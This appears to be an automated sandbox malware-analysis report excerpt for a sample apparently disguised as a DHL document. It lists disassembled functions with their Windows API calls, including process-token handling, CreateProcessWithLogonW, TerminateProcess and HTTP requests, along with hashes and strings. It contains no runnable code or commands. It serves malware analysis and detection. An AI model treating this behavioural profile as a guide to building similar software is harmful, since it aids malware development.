Instruction Fuzzy Hash: 00519B70A0430AEFDF25CF68D888BAEBBF9BF44314F104669E911AB291E7709945CF51

Function 008D1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 008D179A
GetWindowRect.USER32(?,?), ref: 008D17FE
ScreenToClient.USER32(?,?), ref: 008D181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008D182C
EndPaint.USER32(?,?), ref: 008D1876

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: edf1197478b1c948c94bda92e44a3a9e90a8a07f4cdc890664f597ac37db7a2f
Instruction ID: 718dac23d1c991d497a593184a8fd1be7c01433d6df58ddde113e87ba615dbfd
Opcode Fuzzy Hash: edf1197478b1c948c94bda92e44a3a9e90a8a07f4cdc890664f597ac37db7a2f
Instruction Fuzzy Hash: B4418171218305AFDB10DF2ADC88B7A7BE8FF45724F14066AF554C72A1C7319845EB62

Function 0095B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(009967B0,00000000,00E257D0,?,?,009967B0,?,0095B862,?,?), ref: 0095B9CC
EnableWindow.USER32(00000000,00000000), ref: 0095B9F0
ShowWindow.USER32(009967B0,00000000,00E257D0,?,?,009967B0,?,0095B862,?,?), ref: 0095BA50
ShowWindow.USER32(00000000,00000004,?,0095B862,?,?), ref: 0095BA62
EnableWindow.USER32(00000000,00000001), ref: 0095BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0095BAA9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 633f58ec7066f84bea06bffcf88a0cf5900f210440e05b4c39c57df767088407
Instruction ID: 01d2c56cb506be7b6aa89333d30ec64a300ccb85e6b7dc5d02878d98ed7b3a1a
Opcode Fuzzy Hash: 633f58ec7066f84bea06bffcf88a0cf5900f210440e05b4c39c57df767088407
Instruction Fuzzy Hash: 16416230604645AFDB22CF16C499B957BE4FF05316F5842B9FE488F2A2C731A849DB51

Function 009473B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00945134,?,?,00000000,00000001), ref: 009473BF

Part of subcall function 00943C94: GetWindowRect.USER32(?,?), ref: 00943CA7

GetDesktopWindow.USER32 ref: 009473E9
GetWindowRect.USER32(00000000), ref: 009473F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00947422

Part of subcall function 009354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E

GetCursorPos.USER32(?), ref: 0094744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009474AC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: f21c79d161c03aac5c41c7f4f52649cf260fbf07dd44c9cad00c0a203621acc3
Instruction ID: 84a33562c709011568c2678e0bec0cd7ce390791ed3371945c5aa530ad6104ff
Opcode Fuzzy Hash: f21c79d161c03aac5c41c7f4f52649cf260fbf07dd44c9cad00c0a203621acc3
Instruction Fuzzy Hash: 4031D572509309AFD720DF55D849FABBBEAFF88314F004919F58997191D730EA09CB92

Function 00928D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00928608
Part of subcall function 009285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00928612
Part of subcall function 009285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00928621
Part of subcall function 009285F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00928628
Part of subcall function 009285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092863E

GetLengthSid.ADVAPI32(?,00000000,00928977), ref: 00928DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00928DB8
HeapAlloc.KERNEL32(00000000), ref: 00928DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00928DD8
GetProcessHeap.KERNEL32(00000000,00000000,00928977), ref: 00928DEC
HeapFree.KERNEL32(00000000), ref: 00928DF3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: d83888666d1ab695550a74c1cc815a10fdbd2b0207b9d5679c07286943de3979
Instruction ID: 0fc38eb1ed93206e3ac73cd04b0e172127d55213fa13ab66499d29d472c87c9d
Opcode Fuzzy Hash: d83888666d1ab695550a74c1cc815a10fdbd2b0207b9d5679c07286943de3979
Instruction Fuzzy Hash: F611EE31516615FFDB109FA5EC18BAF7BADEF55326F108029F84593294CB32A908DB60

Function 00928AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00928B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00928B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00928B40
CloseHandle.KERNEL32(00000004), ref: 00928B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00928B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00928B8E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: b789e5f1dc6c4ee465f56e4f966ee23b3177f2b40af34442da644b4981393134
Instruction ID: bfa3f92b95002f4fce24764d3ad021f3b69f3afd6804c12759869760269cf51f
Opcode Fuzzy Hash: b789e5f1dc6c4ee465f56e4f966ee23b3177f2b40af34442da644b4981393134
Instruction Fuzzy Hash: 261159B2505209ABDF018FA5ED49FEB7BADEF08315F044068FE04A2160C7768D60AB60

Function 0095C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 008D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D135C
Part of subcall function 008D12F3: BeginPath.GDI32(?), ref: 008D1373
Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0095C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0095C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0095C1F6
EndPath.GDI32(00000000), ref: 0095C206
StrokePath.GDI32(00000000), ref: 0095C216

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a06190fbf9f8491361c0119430b8db034d3fa22e84ed58e34d3013eb21a72579
Instruction ID: 7631ae9aab7f6467f48126c4cc4fcca64c642a5a93fc7ea8deb06e4eae5374e2
Opcode Fuzzy Hash: a06190fbf9f8491361c0119430b8db034d3fa22e84ed58e34d3013eb21a72579
Instruction Fuzzy Hash: DC111E7640820CBFDF119F96DC48E9A7FADEF04365F048061B918861A1D7729D55EBA0

Function 008F03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 008F03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 008F03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 008F0401

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 97723496fea2b7f950df184d99432f972522807f63507749ef768fe358c42002
Instruction ID: ebbae5c9f9b1315f16270a8ddf1aaf284ae5189a378a817feee3d88da7310b22
Opcode Fuzzy Hash: 97723496fea2b7f950df184d99432f972522807f63507749ef768fe358c42002
Instruction Fuzzy Hash: 42016CB09027597DE3009F5A8C85B52FFE8FF19354F00411BA15C47941C7F5A864CBE5

Function 0093568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0093569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009356B1
GetWindowThreadProcessId.USER32(?,?), ref: 009356C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356E0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 32248c7cd49c5bf2f4000e93223da8bd1519667c43035021643cef142b0e477e
Instruction ID: b58564f9a424215c935efad7fc888ce60b8a33fc88400c18efa78dcf63374ff0
Opcode Fuzzy Hash: 32248c7cd49c5bf2f4000e93223da8bd1519667c43035021643cef142b0e477e
Instruction Fuzzy Hash: 76F0123115A658BBE7215B539C0DEAB7B7CEBC6B22F000169FA04D105096A11A0197B5

Function 009374D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 009374E5
EnterCriticalSection.KERNEL32(?,?,008E1044,?,?), ref: 009374F6
TerminateThread.KERNEL32(00000000,000001F6,?,008E1044,?,?), ref: 00937503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,008E1044,?,?), ref: 00937510

Part of subcall function 00936ED7: CloseHandle.KERNEL32(00000000,?,0093751D,?,008E1044,?,?), ref: 00936EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00937523
LeaveCriticalSection.KERNEL32(?,?,008E1044,?,?), ref: 0093752A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f3089ed2b331c9b9c17bdd236ffecf57311e5db46ca7cf5ad1c7b58dc58a8c6d
Instruction ID: bf67e45c651568dac1ff1318c59fd46dba8b8c9df6974a6eec94e4904e215e1f
Opcode Fuzzy Hash: f3089ed2b331c9b9c17bdd236ffecf57311e5db46ca7cf5ad1c7b58dc58a8c6d
Instruction Fuzzy Hash: 8BF05EBA159B12EBEB212B65FC9CAEB772AEF45323F000531F202914B0CB755811EF60

Function 00928E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00928E7F
UnloadUserProfile.USERENV(?,?), ref: 00928E8B
CloseHandle.KERNEL32(?), ref: 00928E94
CloseHandle.KERNEL32(?), ref: 00928E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00928EA5
HeapFree.KERNEL32(00000000), ref: 00928EAC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 9befc3d3b3a3fb891010adcbb87557263ad97929d51555d26ea1b2bd9d8397eb
Instruction ID: 6fa208dc5ab3ac009fb1253b928113c5a644ba4b0e00cf32fa6d8d5bf01144fa
Opcode Fuzzy Hash: 9befc3d3b3a3fb891010adcbb87557263ad97929d51555d26ea1b2bd9d8397eb
Instruction Fuzzy Hash: 7AE05276119A05FBDA012FE6EC1C95ABB69FB89773B508631F21981470CB32A461EB50

Function 00948902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00948928
CharUpperBuffW.USER32(?,?), ref: 00948A37
VariantClear.OLEAUT32(?), ref: 00948BAF

Part of subcall function 00937804: VariantInit.OLEAUT32(00000000), ref: 00937844
Part of subcall function 00937804: VariantCopy.OLEAUT32(00000000,?), ref: 0093784D
Part of subcall function 00937804: VariantClear.OLEAUT32(00000000), ref: 00937859

Strings

AUTOIT.ERROR, xrefs: 00948A3D
Incorrect Parameter format, xrefs: 00948960, 00948B22

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: d5b467d2e6b6c495163015dcd2b2250fe177ef57e2942763fcab83f98471a622
Instruction ID: 4e6d45d07431a9eda622af34a0d2c990c910bb08f5ffa885b96af37d857047fa
Opcode Fuzzy Hash: d5b467d2e6b6c495163015dcd2b2250fe177ef57e2942763fcab83f98471a622
Instruction Fuzzy Hash: 389137756087019FC714EF28C48496BBBE8EF89354F044A6EF89A8B361DB31E945CB52

Function 0092DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0092DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0092DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0092DB8E

Strings

DllGetClassObject, xrefs: 0092DB01

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 2eb2ad613d2cbd24378248836d58902ffa45df9e547486387f108a9e6ce891f5
Instruction ID: 9c4cfdb5bbd5a724a098ab9ca35f716d6f1a02acf90da82c7ccc7f5209bbe730
Opcode Fuzzy Hash: 2eb2ad613d2cbd24378248836d58902ffa45df9e547486387f108a9e6ce891f5
Instruction Fuzzy Hash: DC41C0B1601318EFDB14CF65D894BAA7BB9EF44310F1580A9AD05DF249D7B0DE40DBA0

Function 00932C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00932CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00932CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00932D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00996890,00000000), ref: 00932D5A

Strings

0, xrefs: 00932CA4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 514e5cf8f45b99896bdd531ef308a1516c4164595779a368ded17479cc3b03c6
Instruction ID: 1a690cb7f380787b703f269de2913779c6ad2699d21d83ef08b4d26b02e47715
Opcode Fuzzy Hash: 514e5cf8f45b99896bdd531ef308a1516c4164595779a368ded17479cc3b03c6
Instruction Fuzzy Hash: 28416D302043029FD720DF24C845B6ABBE8EF85720F14465EF965972D1DB70E905CF92

Function 0094DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0094DAD9

Part of subcall function 008D79AB: _memmove.LIBCMT ref: 008D79F9

Strings

stdcall, xrefs: 0094DB5B
none, xrefs: 0094DBB4
winapi, xrefs: 0094DB4A
cdecl, xrefs: 0094DB30

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: ec389411829ef7fd71196598b126b51dff4848c99de693ff21ff31be2224b341
Instruction ID: 17d8aca3329868fd2df9c865f7ab86e72bef78b7a7697c3fc2b87707d6aa74e9
Opcode Fuzzy Hash: ec389411829ef7fd71196598b126b51dff4848c99de693ff21ff31be2224b341
Instruction Fuzzy Hash: 1F31A17450061AAFCF10EF68C890DBEB3B4FF05310B108B2AE866E7795DB31A905CB90

Function 00929372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009293F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00929409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00929439

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

Strings

ComboBox, xrefs: 00929380
ListBox, xrefs: 009293B5

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: ad8e0c16998d83422603110da73da0ef751f799cc58b8b569c49ec1d4dee56db
Instruction ID: 2140341865b5843939b0b745020db6974db68d6ffe404b5f4a04949edd7d7deb
Opcode Fuzzy Hash: ad8e0c16998d83422603110da73da0ef751f799cc58b8b569c49ec1d4dee56db
Instruction Fuzzy Hash: 37212671940118BFDB14AB74EC85DFFB7BCEF45324F14422AF921972E4DB38090A9610

Function 00941B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00941B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00941B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00941B96
InternetCloseHandle.WININET(00000000), ref: 00941BDD

Part of subcall function 00942777: GetLastError.KERNEL32(?,?,00941B0B,00000000,00000000,00000001), ref: 0094278C
Part of subcall function 00942777: SetEvent.KERNEL32(?,?,00941B0B,00000000,00000000,00000001), ref: 009427A1

Strings

, xrefs: 00941B87

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
